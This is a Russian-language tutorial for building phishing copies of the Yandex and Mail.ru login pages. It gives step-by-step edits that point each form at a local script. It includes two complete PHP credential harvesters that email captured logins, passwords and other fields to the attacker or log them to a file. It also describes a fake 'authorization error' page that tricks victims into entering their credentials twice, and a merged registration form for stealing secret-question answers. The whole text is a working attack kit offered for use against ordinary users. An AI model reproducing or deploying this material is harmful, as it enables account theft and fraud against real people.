Доброго времени суток!
И так приступим. Для начала рассмотрим пример приготовление фейка для yandex.ru на страницу авторизации:
Идем на Яндекс и открываем страницу авторизации паспорта http://passport.yandex.ru/passport?mode=passport сохраняем её полностью и открываем страницу html в текстовом редакторе(блокноте).
Ищем там
<form name="MainLogin" class="b-domik b-domik_type_bigform g-js" onclick="return {name: 'b-domik_bigform'}" action="http://passport.yandex.ru/passport?mode=auth" onsubmit="return typeof okButtonClick !== 'undefined' okButtonClick(this) : true" method="post"
и меняем
action=http://passport.yandex.ru/passport?mode=auth
на
action="login.php"
Сохраняем как index.html и с кодировкой windows-1251.
Открываем страницу в браузере что б посмотреть что получилось,если у вас карявое изображение значить жмякаем ctrl+H и заменяем utf-8 на windows-1251.
Далее сам login.php
<?php
$BASE="Ваш E-mail";
$IS_EMAIL=true;
$LOCATION="ссылка";
$p0=$_REQUEST["login"];
$p1=$_REQUEST["passwd"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="login:$p0:Pass:$p1:\n";
if ($IS_EMAIL){
mail($BASE, "Логи прикатили!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
Здесь указываем свой E-mail куда будет приходить отчет и ссылку куда будет перекидывать после ввода данных
Если вы захотите сделать фейк с другой странице яндекса,просто сохраняйте ту страницу которая вас интересует и проделывайте практически тоже самое что и описывалось выше,да чуть не забыл может потребоваться указать имена или как сказать параметры того что вам нужно чтоб было в отчёте.
Например если вы захотите переделать страницу регистрации в страницу подтверждения данных и сделать супер фейк,чтоб можно было узнать не только пароль и логин,а так же и все остальные данные,включая ответ на секретный вопрос и т.д.
Тут будет дело не много сложней,(по крайней мере с яндексом)страница регистрации разделяется на две части,в первой вы вводите( точно не помню) имя,фамилию и логин,а на второй всё остальное(пароль,секретный вопрос,ответ,телефон и т.д.)
Так вот Вам нужно будет соединить две эти странице в одну и убрать поле подтверждение пароля(в общем полная муть),так же в ходе процесса нужно будет найти значение параметров которые будут отсылаться к вам на почтовый ящик.
К примеру,в выше указанном скрипте указаны значения login и passwd,в самой странице они находятся в строках:
<input class="b-input__text" id="b-domik-username11" name="login" value="" tabindex="5"/
и
<input class="b-input__text" id="b-domik-password11" name="passwd" type="password" maxlength="100" tabindex="10"/
Следовательно вам нужно будет указывать те параметры которые пишутся в подобных строках в самом login.php(это к примеру).
На этом с яндексом наверное закончим и перейдем к mail.ru
И так продолжим...
Идем на mail.ru и нажимаем кнопку войти,без ввода каких
либо данных(логина,пароля),нас перекидывает на страницу авторизации http://e.mail.ru/cgi-bin/login
На этой странице нету ни чего лишнего,только поля для
ввода логина и пароля, вот с этой странице мы и сделаем фейк.
Фишка этого фейка будет ещё в том что после ввода пароля и
логина,жертву перекинет на вторую страницу,где будет написано "ошибка
Авторизации.....",тем самым придётся ввести ещё раз данные и к вам придут
ещё раз эти же логи,но жертва будет вводить уже более внимательней,дабы не
допустить ошибку в пароле.
Открываем исходный код страницы,копируем его в текстовик и
ищем строку :
<form method="post" action="http://win.mail.ru/cgi-bin/auth" name="Auth" onSubmit="return CheckForm(this);"
меняем её на :
<form method="post" action="login.php" name="value"
Сохраняем как index.html и в обоих полях,пишем к примеру PROVERKA (в место логина и пароля)нас перекинет на страницу с ошибкой,
проделываем тоже самое что и для первой странице,только сохраняем как erorr.html и в строке
<form method="post" action="login.php" name="value"
в место login.php напишем activ.php
Теперь login.php для первой странице index.html:
<?php
/*
переадресация на выход
*/
$BASE=" Ваш E-mail ";
$IS_EMAIL=true;
$LOCATION="activ.html";
$p0=$_REQUEST["srvt="];
$p1=$_REQUEST["DESCRIPTION"];
$p2=$_REQUEST["Keywords"];
$p3=$_REQUEST["Auth"];
$p4=$_REQUEST["page"];
$p5=$_REQUEST["post"];
$p6=$_REQUEST["login_from"];
$p7=$_REQUEST["Login"];
$p8=$_REQUEST["Domain"];
$p9=$_REQUEST["Password"];
$p10=$_REQUEST["level"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="$p0:$p1:$p2:$p3:$p4:$p5:$p6:$p7:$p8:$p9:$p10:\n";
if ($IS_EMAIL){
mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
Указываем только свой E-mail куда будет приходить отчет.
activ.php будет практически такой же как и login.php за
исключением ссылки,то есть в место erorr.html указываем другую ссылку куда
будет перекидывать жертву, после того как она введёт оба раза свои данные.
Так что его я писать не буду, тут надеюсь и так будет
понятно
